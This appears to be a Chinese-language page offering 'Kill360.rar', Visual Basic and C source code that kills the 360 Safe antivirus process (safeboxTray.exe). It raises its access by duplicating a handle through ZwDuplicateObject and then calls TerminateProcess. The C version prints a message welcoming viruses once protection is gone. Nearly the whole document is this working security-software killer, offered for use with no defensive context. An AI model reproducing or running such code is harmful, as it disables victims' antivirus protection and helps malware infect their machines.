Kill360.rar

Kill 360Safe 完整版（VB版） Option Explicit Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function ZwDuplicateObject _ Lib "NTDLL.DLL" (ByVal SourceProcessHandle As Long, _ ByVal SourceHandle As Long, _ ByVal TargetProcessHandle As Long, _ ByRef TargetHandle As Long, _ ByVal DesiredAccess As Long, _ ByVal HandleAttributes As Long, _ ByVal Options As Long) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long Function FcOpenProcess&(p&) Dim ProcessHandle As Long Dim Rtn As Long ProcessHandle = OpenProcess(&H400, 0, p) If ProcessHandle <> 0 Then Rtn = ZwDuplicateObject(-1, ProcessHandle, -1, VarPtr(ProcessHandle), &H1F0FFF, 0, 1) FcOpenProcess = ProcessHandle End If End Function Private Sub Command1_Click() Dim ProcessHandle As Long ProcessHandle = FcOpenProcess&(1884) TerminateProcess ProcessHandle, 0 End Sub 1884是进程PID ，使用的话需要完成进程到pid的转换！ #include #include #include unsigned long getprocid(char *pn) { BOOL b; HANDLE hnd; PROCESSENTRY32 pe; hnd=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); pe.dwSize=sizeof(pe); b=Process32First(hnd,&pe); while(b) { if(strcmp(pn,pe.szExeFile)==0)return pe.th32ProcessID; b=Process32Next(hnd,&pe); } return 0; } int main() { HMODULE hNTDLL = GetModuleHandle("ntdll.dll"); void (WINAPI *ZwDuplicateObject) (DWORD,HANDLE,DWORD,PHANDLE,unsigned long,unsigned long,unsigned long); (FARPROC&)ZwDuplicateObject= GetProcAddress(hNTDLL,"ZwDuplicateObject"); DWORD pid=0; pid=getprocid("safeboxTray.exe"); if(pid==0) { printf("找不到360保险箱的进程ID"); } HANDLE ProcessHandle=OpenProcess(PROCESS_DUP_HANDLE,FALSE,pid); if(ProcessHandle != NULL) { ZwDuplicateObject(-1,ProcessHandle,-1,&ProcessHandle,2035711,0,1); TerminateProcess(ProcessHandle,0); printf("我走了,毒来吧\n"); return 1; } printf("升级了\n"); return 0; }